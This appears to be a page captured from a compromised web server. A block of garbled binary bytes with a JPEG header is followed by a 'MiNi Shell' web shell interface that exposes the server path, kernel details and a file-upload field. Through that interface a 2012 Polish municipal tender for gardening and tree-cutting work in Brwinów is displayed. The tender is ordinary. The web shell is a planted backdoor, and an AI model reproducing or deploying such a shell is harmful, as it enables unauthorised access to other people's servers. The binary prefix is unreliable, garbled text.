JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120110/9489-N-2012.html

<p class="kh_header"><b>Brwinów: PRACE OGRODNICZE NA TERENIE GMINY BRWINÓW W 2012 ROKU.</b><br>
<b>Numer ogłoszenia: 9489 - 2012; data zamieszczenia: 10.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Brwinów , ul. Grodziska 12, 05-840 Brwinów, woj. mazowieckie, tel. 7382567, faks 7295940.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brwinow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRACE OGRODNICZE NA TERENIE GMINY BRWINÓW W 2012 ROKU..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1 . Koszenie 
Zakres robót obejmuje koszenie traw i chwastów oraz kompleksowe oczyszczenie terenu po koszeniu tj. grabienie, wywóz liści, gałęzi, skoszonej trawy i innych bioodpadów w okresie od 1 maja do 30 września - koszenie dwa razy w miesiącu ( 5 miesięcy ):
1)	Pasy trawnikowe przy następujących drogach gminnych wraz z rowami melioracyjnymi i przydrożnymi.
Brwinów PN : ul. Kryniczanki ( do Zimnej Wody ), ul. Łomżyńska, ul. Wigusin, ul. Nadrzeczna, ul. Gliniana wraz z odcinkiem pasu 4 metrowego wokół glinianek, ul. Białostocka, ul. Modlińska, ul. Grodzieńska, ul. Suwalska, ul. Augustowska, ul. Płocka, ul. Skudry, ul. Wileńska, ul. Klonowa, ul. Jasna, ul. Kwiatowa, ul. Słowackiego, ul. Spółdzielcza, ul. Bankowa, ul. Spółdzielcza, ul. Dworska, ul. Żytnia, ul. Moczydłowskiego, ul. Lipowa, ul. 11-go Listopada, ul. Skierniewicka, ul. Mszczonowska, ul. Kusocińskiego, ul. Turystyczna, ul. Wiśniowa, ul. Żabia, ul. Żółwia, ul. Żurawia, ul. Wygonowa, ul. Głowackiego, ul. Czubińska, ul. Błońska, ul. Żukowska ul. Kampinoska ul. Struga. 
Brwinów PD : ul. Moniuszki, ul. Krótka, ul. Zacisze, ul. Boczna, ul. Kolejowa, ul. Górna, ul. Narutowicza, ul. Myśliwska, ul. Rawska, ul. Świerkowa, ul. Piotrkowska, ul. Radomska, ul. Kielecka, ul. Puławska, ul. Okopowa, ul. Orzeszkowej, ul. Konopnickiej, ul. Prusa, ul. Paszkowskiego, ul. Borkowa, ul. Różana, ul. Brzozowa, ul. Sosnowa, ul. Poprzeczna, ul. Dębowa, ul. Cicha, ul. Piaskowa, ul. Krucza, ul. Jodłowa, ul. Leśnej Polany, ul. Otrębuska, ul. Kubusia Puchatka, ul. Wesoła, ul. Letnia, ul. Wiosenna, ul. Miodowa, ul. Stalowa, ul. Owsiana , ul. Zielona, ul. Akacjowa, ul. Mazowiecka, ul. Fabryczna, ul. Figowa ul. Wiktorska, ul. Helenowska, ul. Niecała, ul. Gardenii, ul. Piastowska, ul. Rodzinna, ul. Parzniewska, ul. Krańcowa, ul. Modrzewiowa, ul. Komorowska, ul. Orla, ul. Gdańska, ul. Nowoprojektowana, ul. Polna, ul. Jesionowa, ul. boczna od Pszczelińskiej prz sklepie Patrix, ul. Jaśminowa, ul. Lilpopa ( odcinek za trasą ), ul. Raszyńska, ul. Piastowa, ul. Partyzantów ( za trasą ), ul. Magnolii.
Owczarnia: ul. Książenicka ( część Gminna - między ul. Grodziską a ul. Kazimierzowską), ul. Żółwińska (część Gminna między - ul. Grodziską a ul. Kazimierzowską), ul. Mała, ul. Polna, ul. Boczna, ul. Zaułek, ul. Pod Dębami, ul. Grodziska, ul. Łokietka, ul. Milanowiecka, ul. Pochyła, ul. Piastowska, ul. Jagielońska, ul. Letniskowa, ul. Jagiellonki, ul. Chrobrego, ul. Jadwigi, ul. Kingi, ul. Bony, ul. Mieszka I. 
Żółwin: ul. Klonowa, ul. Łąkowa, ul. Zarybie + rowy , ul. Niecała, ul. Leśna, ul. Świerkowa, ul. Sosnowa, ul. Boczna,   ul. Nadarzyńska + rowy  ( od ul. Słonecznej do ul. Młochowskiej ), ul. Mokra, ul. Szkolna, ul. Południowa, ul. Młochowska
Parzniew: droga od ul. Granicznej w Brwinowie do ul. Głównej w Parzniewie
( tj. ul. Rrzeczna ) 
Otrębusy: ul. Jałowcowa, ul. Przejazdowa + boczne,  ul. Łosia + boczne, ul. Parkowa + boczna, ul. Projektowana, ul. Wiejska ( bez chodnika ), ul. Kolberga, ul. Teoplitza, ul. Sadowa  + boczne, ul. M.Dąbrowskiej + plac, ul. Wspólna, ul. Wesoła, ul. Dunina, ul. Topolowa, ul. Komorowska, ul. Helenowska, ul. Szkolna, ul. Tulipanowa, ul. Łąkowa, ul. Klonowiec, ul. Torfowa, ul. Na Skraju, ul. Malinowa, ul. Świerkowa, ul. Poziomki + boczne, ul. Brzozowa, ul. Wrzosowa, ul. Orzechowa, ul. Różana, ul. Jeżynowa, ul. Podleśna, ul. Lipowa, ul. Borówki, ul. Tarniny, ul. Sosnowa, ul. Mickiewicza, ul. Franciszkańska, ul. Poranna, ul. Akacjowa, ul. Słowackiego, ul. Szopena, ul. Kubusia Puchatka, ul. Baśniowa + ul. Piasta, ul. Pogodna, ul. Piękna 
Kanie: ul. Baśniowa, ul. Polna + boczne, uL. Działkowa, ul. Miłosna, ul. Kręta, ul. Radosna, ul. Chopina, ul. Kryniczna, ul. Zdrojowa, ul. Moniuszki, ul. Nadarzyńska (bez chodnika ), ul. Wiśniowa, ul. Spokojna, ul. Cicha, ul. Piaskowa, ul. Promienna, ul. Szkolna, ul. Wiklinowa, ul. Kolejowa, ul. Kwiatów Polnych, ul. Gościnna, ul. Górna + boczne, ul. Partyzantów, ul. Leśna, ul. Turystyczna, ul. Parkowa ul. Prosta, ul. Słowackiego + boczne, ul. Szczęsna, ul. Kwiatowa, ul. Różana, ul. Grażyny, ul. Krótka, ul. Niecała, ul. Spacerowa, ul. Poranna, ul. Wiosenna.
2 ) Trawniki na terenie następujących  parków gminnych:
Park Miejski w Brwinowie, Park Toeplitza w Otrębusach przy pałacyku, Park Leśny  przy ul. Karolińskiej róg Natalińskiej, Owczarnia - ul. Mała  teren zieleni przy placu zabaw dla dzieci 
Łączna powierzchnia trawników wynosi-  245 000   m 2
Do cen należy wliczyć koszt związany z wywiezieniem i utylizacją w/w odpadów biodegradowalnych

2. Prace ogrodnicze - - ceny jednostkowe za następujące prace ogrodnicze:
1) Wycinka drzew wg. średnic mierzonych na wysokości 130 cm:
   drzewa o średnicy do 20 cm -
   drzewa o średnicy 21-40 cm-
   drzewa o średnicy 41-60 cm -
   drzewa o średnicy 61- 80 cm -
   drzewa o średnicy  od 81 cm -
zakres prac max. 300 drzew na rok

2) Cięcia pielęgnacyjne i techniczne, korekta koron w tym pod liniami - wg. średnic mierzonych na wysokości 130 cm:
   drzewa o średnicy do 20 cm -
   drzewa o średnicy 21-40 cm-
   drzewa o średnicy 41-60 cm -
   drzewa o średnicy 61- 80 cm -
   drzewa o średnicy  większej niż 81 cm -
zakres prac max. 300 drzew na rok

 Do cen należy wliczyć 
-	koszt zabezpieczenia ran po cięciach, 
-	usunięcie karp dowolną metodą ( frezowanie, karczowanie )
-	uprzątnięcie terenu po wycince 
-	przewiezienie pozyskanego drewna w miejsce wskazane przez Urząd ( teren Gminy Brwinów  )
-	odpowiednie zabezpieczenie terenu podczas prowadzonych wycinek i cięć
-	załatwienie formalności związanych z wyłączeniem linii wraz z ponoszeniem opłat z tym związanych.

Wykonawca zapewnia niezbędny sprzęt i narzędzia we własnym zakresie w tym podnośnik oraz ponosi wszystkie dodatkowe opłaty związane z wykonaniem wymienionych usług.  
Przedmiotowe prace będą zgłaszane przez pracownika Urzędu Gminy Brwinów ds. zieleni miejskiej. Jednocześnie informujemy, że wymagamy gotowości do nagłych prac przy drzewostanie np. po wichurach, nagłe wywroty drzew, zagrażające konary itp. W zakres prac ogrodniczych wchodzą również cięcia drzew pod liniami energetycznymi oraz w przypadkach zagrożenia dla bezpieczeństwa ludzi i mienia cięcia pomników przyrody..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających w wysokości do 10% wartości zamówienia podstawowego, polegające na powtórzeniu tego samego rodzaju zamówień. Na zamówienia uzupełniające zostanie zawarta odrębna umowa na podstawie art.67 ust.1 pkt.6 ustawy Pzp.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.30.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>działalność stanowiąca przedmiot zamówienia nie wymaga posiadania szczególnych uprawnień wynikających z przepisów prawa.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dysponuje lub będzie dysponował co najmniej 1 osobą - posiadającą niezbędne kwalifikacje do kierowania pracami konserwatorskimi lub restauratorskimi przy parkach zabytkowych zgodnie z § 23 ust.1 rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011r. (Dz. U. z 2011r. Nr 165, poz.987),
- dysponuje lub będzie dysponował co najmniej 1 osobą - posiadającą niezbędne kwalifikacje do prowadzenia prac o charakterze technicznym przy parkach zabytkowych zgodnie z § 23 ust.4 rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 27 lipca 2011r. (Dz. U. z 2011r. Nr 165, poz.987),

Ocena sposobu dokonywania spełniania warunków udziału w postępowaniu będzie dokonana wg formuły spełnia/nie spełnia. Nie spełnienie w/w warunków skutkować będzie wykluczeniem z postępowania.

Wykaz oświadczeń i dokumentów, jakie Wykonawcy mają dostarczyć w celu potwierdzenia spełnienia warunków udziału w postępowaniu:
1) Oświadczenie o spełnianiu warunków udziału w postępowaniu na załączniku nr 2;
2) Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nich czynności - na załączniku nr 3, oraz informacją o podstawie do dysponowania tymi osobami;
3) Oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia na załączniku nr 4;
4) Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia innych podmiotów. W takiej sytuacji Wykonawca jest zobowiązany udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art.144 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość wprowadzenia istotnej zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących okolicznościach:
1)	zmiany wysokości podatku VAT, jeżeli w okresie obowiązywania umowy nastąpi zmiana przepisów podatkowych, 
2)	zmiany podmiotu trzeciego (podwykonawcy),  
3)	jeżeli konieczność wprowadzenia takiej zmiany wynika z okoliczności, których nie można było przewidzieć w ogłoszeniu o zamówieniu lub SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.brwinow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD GMINY BRWINÓW,  05-840 BRWINÓW, UL.KOŚCIUSZKI 4A, Zespół ds. Zamówień Publicznych, pokój nr 22.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.01.2012 godzina 13:00, miejsce: URZĄD GMINY BRWINÓW,  05-840 BRWINÓW, UL.GRODZISKA 12, Biuro Obsługi Interesanta - pokój nr 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com